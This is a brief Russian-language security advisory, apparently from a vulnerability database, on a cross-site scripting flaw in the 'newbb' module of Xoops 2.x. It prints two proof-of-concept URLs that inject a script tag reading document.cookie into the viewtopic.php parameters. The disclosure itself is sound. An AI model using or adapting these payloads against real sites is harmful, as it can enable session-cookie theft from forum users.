Межсайтовый скриптинг в Xoops в 'newbb’ модуле

Дата публикации:
28.01.2004
Всего просмотров:
1830
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Xoops 2.x

Описание: Уязвимость обнаружена в Xoops в 'newbb’ модуле. Удаленный пользователь может выполнить XSS нападение.

Пример/Эксплоит:

http://[target]/modules/newbb/viewtopic.php?topic_id=14577&forum=2"><script>alert(document.cookie);</script>

http://[target]/modules/newbb/viewtopic.php?topic_id=14577"><script>alert(document.cookie);</script>&forum=2

URL производителя:http://xoops.org/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Xoops newbb module XSS vulnerability

или введите имя

CAPTCHA